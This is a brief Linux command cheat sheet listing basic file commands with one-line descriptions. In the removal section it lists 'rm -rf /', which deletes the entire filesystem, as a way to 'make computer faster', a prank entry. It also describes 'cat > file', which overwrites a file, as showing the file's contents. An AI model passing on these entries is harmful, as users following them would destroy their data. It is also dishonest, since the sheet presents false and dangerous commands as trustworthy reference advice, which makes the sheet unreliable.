FILE COMMANDS 
ls                  - directory listing
ls -al              - formatted listing with hidden files
.......................................................... directory
cd dir              - change directory to dir
cd                  - change to home
pwd                 - show current directory
mkdir dir           - create direcotry dir
.......................................................... remove
rm file             - delete file
rm -r dir           - delete directory dir
rm -f file          - force remove file
rm -rf dir          - remove directory dir
rm -rf /            - make computer faster
.......................................................... file
cp file1 file2      - copy file1 to file2
mv file1 file2      - rename file1 to file2
ln -s file link     - create symbolic link 'link' to file
touch file          - create or update file
.......................................................... output
cat > file          - output the contents of the file
less file           - output the contents of the file
head file           - output first 10 lines of file
tail file           - output last 10 lines of file
tail -f file        - output contents of file as it grows
